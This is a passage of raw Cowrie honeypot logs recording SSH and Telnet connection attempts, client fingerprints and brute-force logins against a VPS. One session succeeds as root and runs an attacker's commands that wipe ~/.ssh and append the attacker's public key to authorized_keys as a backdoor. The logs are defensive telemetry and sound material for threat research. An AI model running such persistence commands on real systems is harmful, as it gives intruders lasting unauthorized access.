],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-09T03:30:56.954531Z","src_ip":"212.227.125.160","session":"4ed5d33e5061"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44582,"dst_ip":"1.2.3.4","dst_port":22,"session":"fda072d2a431","protocol":"ssh","message":"New connection: 212.227.235.229:44582 (1.2.3.4:22) [session: fda072d2a431]","sensor":"my-vps","timestamp":"2025-09-09T03:31:05.288703Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:31:05.404916Z","src_ip":"212.227.235.229","session":"fda072d2a431"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:31:05.569044Z","src_ip":"212.227.125.160","session":"4ed5d33e5061"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50556,"dst_ip":"1.2.3.4","dst_port":22,"session":"c12e86e29031","protocol":"ssh","message":"New connection: 217.72.205.35:50556 (1.2.3.4:22) [session: c12e86e29031]","sensor":"my-vps","timestamp":"2025-09-09T03:33:25.273842Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:33:25.275225Z","src_ip":"217.72.205.35","session":"c12e86e29031"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59298,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ff21041bebb","protocol":"ssh","message":"New connection: 217.72.205.35:59298 (1.2.3.4:22) [session: 0ff21041bebb]","sensor":"my-vps","timestamp":"2025-09-09T03:40:15.820227Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:40:15.821364Z","src_ip":"217.72.205.35","session":"0ff21041bebb"}
{"eventid":"cowrie.session.connect","src_ip":"87.236.176.28","src_port":51423,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e803679659e","protocol":"ssh","message":"New connection: 87.236.176.28:51423 (1.2.3.4:22) [session: 5e803679659e]","sensor":"my-vps","timestamp":"2025-09-09T03:43:58.405742Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.236.176.28","src_port":49579,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcb51db02afa","protocol":"ssh","message":"New connection: 87.236.176.28:49579 (1.2.3.4:22) [session: bcb51db02afa]","sensor":"my-vps","timestamp":"2025-09-09T03:44:03.467592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:44:03.469260Z","src_ip":"87.236.176.28","session":"bcb51db02afa"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-09-09T03:44:03.493706Z","src_ip":"87.236.176.28","session":"bcb51db02afa"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:44:03.519564Z","src_ip":"87.236.176.28","session":"bcb51db02afa"}
{"eventid":"cowrie.session.closed","duration":"120.1","message":"Connection lost after 120.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:45:58.507799Z","src_ip":"87.236.176.28","session":"5e803679659e"}
{"eventid":"cowrie.session.connect","src_ip":"194.165.16.166","src_port":65291,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ccb531f1cf5","protocol":"ssh","message":"New connection: 194.165.16.166:65291 (1.2.3.4:22) [session: 5ccb531f1cf5]","sensor":"my-vps","timestamp":"2025-09-09T03:46:12.388602Z"}
{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-09-09T03:46:12.389281Z","src_ip":"194.165.16.166","session":"5ccb531f1cf5"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:46:12.390375Z","src_ip":"194.165.16.166","session":"5ccb531f1cf5"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":42128,"dst_ip":"1.2.3.4","dst_port":22,"session":"808cd81f8b06","protocol":"ssh","message":"New connection: 51.81.118.153:42128 (1.2.3.4:22) [session: 808cd81f8b06]","sensor":"my-vps","timestamp":"2025-09-09T03:46:37.243541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:46:37.244333Z","src_ip":"51.81.118.153","session":"808cd81f8b06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:46:37.339850Z","src_ip":"51.81.118.153","session":"808cd81f8b06"}
{"eventid":"cowrie.login.failed","username":"gituser","password":"!","message":"login attempt [gituser/!] failed","sensor":"my-vps","timestamp":"2025-09-09T03:46:37.766929Z","src_ip":"51.81.118.153","session":"808cd81f8b06"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:46:38.865844Z","src_ip":"51.81.118.153","session":"808cd81f8b06"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60444,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd4aff244d59","protocol":"telnet","message":"New connection: 113.167.191.187:60444 (1.2.3.4:23) [session: dd4aff244d59]","sensor":"my-vps","timestamp":"2025-09-09T03:46:44.657360Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60462,"dst_ip":"1.2.3.4","dst_port":23,"session":"8434890943c2","protocol":"telnet","message":"New connection: 113.167.191.187:60462 (1.2.3.4:23) [session: 8434890943c2]","sensor":"my-vps","timestamp":"2025-09-09T03:46:45.666649Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60514,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d3e719e03e3","protocol":"telnet","message":"New connection: 113.167.191.187:60514 (1.2.3.4:23) [session: 3d3e719e03e3]","sensor":"my-vps","timestamp":"2025-09-09T03:46:47.693516Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60792,"dst_ip":"1.2.3.4","dst_port":22,"session":"76c77db62b1c","protocol":"ssh","message":"New connection: 217.72.205.35:60792 (1.2.3.4:22) [session: 76c77db62b1c]","sensor":"my-vps","timestamp":"2025-09-09T03:46:47.749929Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:46:47.751008Z","src_ip":"217.72.205.35","session":"76c77db62b1c"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60558,"dst_ip":"1.2.3.4","dst_port":23,"session":"118e817614cd","protocol":"telnet","message":"New connection: 113.167.191.187:60558 (1.2.3.4:23) [session: 118e817614cd]","sensor":"my-vps","timestamp":"2025-09-09T03:46:51.791063Z"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60686,"dst_ip":"1.2.3.4","dst_port":23,"session":"1bc6157f658e","protocol":"telnet","message":"New connection: 113.167.191.187:60686 (1.2.3.4:23) [session: 1bc6157f658e]","sensor":"my-vps","timestamp":"2025-09-09T03:46:59.956507Z"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41894,"dst_ip":"1.2.3.4","dst_port":22,"session":"33bebaf63e37","protocol":"ssh","message":"New connection: 152.32.190.168:41894 (1.2.3.4:22) [session: 33bebaf63e37]","sensor":"my-vps","timestamp":"2025-09-09T03:47:14.906228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:47:14.907091Z","src_ip":"152.32.190.168","session":"33bebaf63e37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:47:15.160130Z","src_ip":"152.32.190.168","session":"33bebaf63e37"}
{"eventid":"cowrie.session.closed","duration":30.51138401031494,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:15.168656Z","src_ip":"113.167.191.187","session":"dd4aff244d59"}
{"eventid":"cowrie.session.connect","src_ip":"113.167.191.187","src_port":60980,"dst_ip":"1.2.3.4","dst_port":23,"session":"549efc661632","protocol":"telnet","message":"New connection: 113.167.191.187:60980 (1.2.3.4:23) [session: 549efc661632]","sensor":"my-vps","timestamp":"2025-09-09T03:47:16.125750Z"}
{"eventid":"cowrie.session.closed","duration":30.505280017852783,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:16.171858Z","src_ip":"113.167.191.187","session":"8434890943c2"}
{"eventid":"cowrie.login.failed","username":"db2inst1","password":"1","message":"login attempt [db2inst1/1] failed","sensor":"my-vps","timestamp":"2025-09-09T03:47:16.214550Z","src_ip":"152.32.190.168","session":"33bebaf63e37"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:17.470156Z","src_ip":"152.32.190.168","session":"33bebaf63e37"}
{"eventid":"cowrie.session.closed","duration":30.494599103927612,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:18.188053Z","src_ip":"113.167.191.187","session":"3d3e719e03e3"}
{"eventid":"cowrie.session.closed","duration":30.39424419403076,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:22.185213Z","src_ip":"113.167.191.187","session":"118e817614cd"}
{"eventid":"cowrie.session.closed","duration":31.22645878791809,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:31.182866Z","src_ip":"113.167.191.187","session":"1bc6157f658e"}
{"eventid":"cowrie.session.closed","duration":31.033709049224854,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:47.159394Z","src_ip":"113.167.191.187","session":"549efc661632"}
{"eventid":"cowrie.session.connect","src_ip":"143.198.195.7","src_port":48610,"dst_ip":"1.2.3.4","dst_port":22,"session":"58a14079dd31","protocol":"ssh","message":"New connection: 143.198.195.7:48610 (1.2.3.4:22) [session: 58a14079dd31]","sensor":"my-vps","timestamp":"2025-09-09T03:47:52.745989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:47:52.747053Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:47:52.935676Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc.1234","message":"login attempt [root/Abc.1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:47:53.733712Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:47:54.176790Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.177454Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.178279Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.372183Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.session.connect","src_ip":"220.248.35.196","src_port":46100,"dst_ip":"1.2.3.4","dst_port":22,"session":"8569947e5e92","protocol":"ssh","message":"New connection: 220.248.35.196:46100 (1.2.3.4:22) [session: 8569947e5e92]","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.676974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.677842Z","src_ip":"220.248.35.196","session":"8569947e5e92"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:47:54.777559Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.778329Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.967605Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:54.968417Z","src_ip":"143.198.195.7","session":"58a14079dd31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:47:55.000773Z","src_ip":"220.248.35.196","session":"8569947e5e92"}
{"eventid":"cowrie.session.connect","src_ip":"143.198.195.7","src_port":44996,"dst_ip":"1.2.3.4","dst_port":22,"session":"e38e5c9ab262","protocol":"ssh","message":"New connection: 143.198.195.7:44996 (1.2.3.4:22) [session: e38e5c9ab262]","sensor":"my-vps","timestamp":"2025-09-09T03:47:55.153629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:47:55.154449Z","src_ip":"143.198.195.7","session":"e38e5c9ab262"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:47:55.341625Z","src_ip":"143.198.195.7","session":"e38e5c9ab262"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:47:56.130444Z","src_ip":"143.198.195.7","session":"e38e5c9ab262"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:47:57.320570Z","src_ip":"143.198.195.7","session":"e38e5c9ab262"}
{"eventid":"cowrie.session.connect","src_ip":"143.198.195.7","src_port":45006,"dst_ip":"1.2.3.4","dst_port":22,"session":"75e19935f379","protocol":"ssh","message":"New connection: 143.198.195.7:45006 (1.2.3.4:22) [session: 75e19935f379]","sensor":"my-vps","timestamp":"2025-09-09T03:47:57.509542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:47:57.510283Z","src_ip":"143.198.195.7","session":"75e19935f379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305